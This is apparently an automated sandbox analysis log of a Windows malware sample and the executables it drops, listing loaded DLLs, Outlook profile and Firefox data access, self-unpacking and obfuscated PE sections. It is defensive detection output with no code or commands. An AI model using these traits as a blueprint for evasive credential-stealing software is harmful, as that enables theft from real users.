Source: C:\Users\userAKKKFBGDHJ.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\userAKKKFBGDHJ.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\userAKKKFBGDHJ.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe Section loaded: msvcr100.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Section loaded: pcacli.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Section loaded: sfc_os.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe Section loaded: msvcr100.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Section loaded: pcacli.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Section loaded: sfc_os.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe Section loaded: msvcr100.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32 Jump to behavior
Source: C:\Program Files\Mozilla Firefox\firefox.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\compatibility.ini
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Windows\SysWOW64\msvcr100.dll Jump to behavior
Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.2401826383.000000006C61D000.00000002.00000001.01000000.00000008.sdmp
Source: Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.2402076310.000000006C7DF000.00000002.00000001.01000000.00000007.sdmp
Source: Binary string: nss3.pdb source: file.exe, 00000000.00000002.2402076310.000000006C7DF000.00000002.00000001.01000000.00000007.sdmp
Source: Binary string: mozglue.pdb source: file.exe, 00000000.00000002.2401826383.000000006C61D000.00000002.00000001.01000000.00000008.sdmp

Data Obfuscation
barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.lowo:R;.nade:W;.rsrc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe Unpacked PE file: 5.2.RoamingCFCGIIEHIE.exe.360000.0.unpack :EW;.rsrc:W;.idata :W; :EW;cwtgiuyn:EW;mrbyzpwc:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;cwtgiuyn:EW;mrbyzpwc:EW;.taggant:EW;
Source: C:\Users\userAKKKFBGDHJ.exe Unpacked PE file: 8.2.userAKKKFBGDHJ.exe.40000.0.unpack :EW;.rsrc:W;.idata :W; :EW;pcxsfzhs:EW;plzfkdac:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;pcxsfzhs:EW;plzfkdac:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Unpacked PE file: 9.2.explorti.exe.3a0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;cwtgiuyn:EW;mrbyzpwc:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;cwtgiuyn:EW;mrbyzpwc:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Unpacked PE file: 10.2.explorti.exe.3a0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;cwtgiuyn:EW;mrbyzpwc:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;cwtgiuyn:EW;mrbyzpwc:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Unpacked PE file: 16.2.axplong.exe.7f0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;pcxsfzhs:EW;plzfkdac:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;pcxsfzhs:EW;plzfkdac:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Unpacked PE file: 18.2.axplong.exe.7f0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;pcxsfzhs:EW;plzfkdac:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;pcxsfzhs:EW;plzfkdac:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Unpacked PE file: 19.2.explorti.exe.3a0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;cwtgiuyn:EW;mrbyzpwc:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;cwtgiuyn:EW;mrbyzpwc:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe Unpacked PE file: 20.2.624f4d727e.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.lowo:R;.nade:W;.rsrc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Unpacked PE file: 23.2.bdb44f72d9.exe.2b0000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;Unknown_Section3:EW;Unknown_Section4:EW;.rsrc:R;Unknown_Section6:EW;.data:EW; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:W;Unknown_Section3:R;Unknown_Section4:R;.rsrc:R;Unknown_Section6:EW;.data:EW;
Source: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe Unpacked PE file: 24.2.624f4d727e.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.lowo:R;.nade:W;.rsrc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Unpacked PE file: 27.2.bdb44f72d9.exe.2b0000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;Unknown_Section3:EW;Unknown_Section4:EW;.rsrc:R;Unknown_Section6:EW;.data:EW; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:W;Unknown_Section3:R;Unknown_Section4:R;.rsrc:R;Unknown_Section6:EW;.data:EW;
Source: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe Unpacked PE file: 34.2.624f4d727e.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.lowo:R;.nade:W;.rsrc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;
Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe Unpacked PE file: 20.2.624f4d727e.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe Unpacked PE file: 24.2.624f4d727e.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe Unpacked PE file: 34.2.624f4d727e.exe.400000.0.unpack
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004195E0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_004195E0
Entry point lies outside standard sections
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
PE file contains an invalid checksum
Source: explorti.exe.5.dr Static PE information: real checksum: 0x1cd2f9 should be: 0x1cfa89
Source: axplong.exe.8.dr Static PE information: real checksum: 0x1d101c should be: 0x1d2453
Source: RoamingCFCGIIEHIE.exe.0.dr Static PE information: real checksum: 0x1cd2f9 should be: 0x1cfa89
Source: userAKKKFBGDHJ.exe.0.dr Static PE information: real checksum: 0x1d101c should be: 0x1d2453
PE file contains sections with non-standard names
Source: file.exe Static PE information: section name: .lowo
Source: file.exe Static PE information: section name: .nade
Source: msvcp140.dll.0.dr Static PE information: section name: .didat
Source: msvcp140[1].dll.0.dr Static PE information: section name: .didat
Source: nss3.dll.0.dr Static PE information: section name: .00cfg
Source: nss3[1].dll.0.dr Static PE information: section name: .00cfg
Source: softokn3.dll.0.dr Static PE information: section name: .00cfg
Source: softokn3[1].dll.0.dr Static PE information: section name: .00cfg
Source: freebl3.dll.0.dr Static PE information: section name: .00cfg
Source: freebl3[1].dll.0.dr Static PE information: section name: .00cfg
Source: mozglue.dll.0.dr Static PE information: section name: .00cfg
Source: mozglue[1].dll.0.dr Static PE information: section name: .00cfg
Source: RoamingCFCGIIEHIE.exe.0.dr Static PE information: section name:
Source: RoamingCFCGIIEHIE.exe.0.dr Static PE information: section name: .idata
Source: RoamingCFCGIIEHIE.exe.0.dr Static PE information: section name:
Source: RoamingCFCGIIEHIE.exe.0.dr Static PE information: section name: cwtgiuyn
Source: RoamingCFCGIIEHIE.exe.0.dr Static PE information: section name: mrbyzpwc
Source: RoamingCFCGIIEHIE.exe.0.dr Static PE information: section name: .taggant
Source: random[1].exe.0.dr Static PE information: section name: .lowo
Source: random[1].exe.0.dr Static PE information: section name: .nade
Source: userAKKKFBGDHJ.exe.0.dr Static PE information: section name:
Source: userAKKKFBGDHJ.exe.0.dr Static PE information: section name: .idata
Source: userAKKKFBGDHJ.exe.0.dr Static PE information: section name:
Source: userAKKKFBGDHJ.exe.0.dr Static PE information: section name: pcxsfzhs
Source: userAKKKFBGDHJ.exe.0.dr Static PE information: section name: plzfkdac
Source: userAKKKFBGDHJ.exe.0.dr Static PE information: section name: .taggant
Source: explorti.exe.5.dr Static PE information: section name:
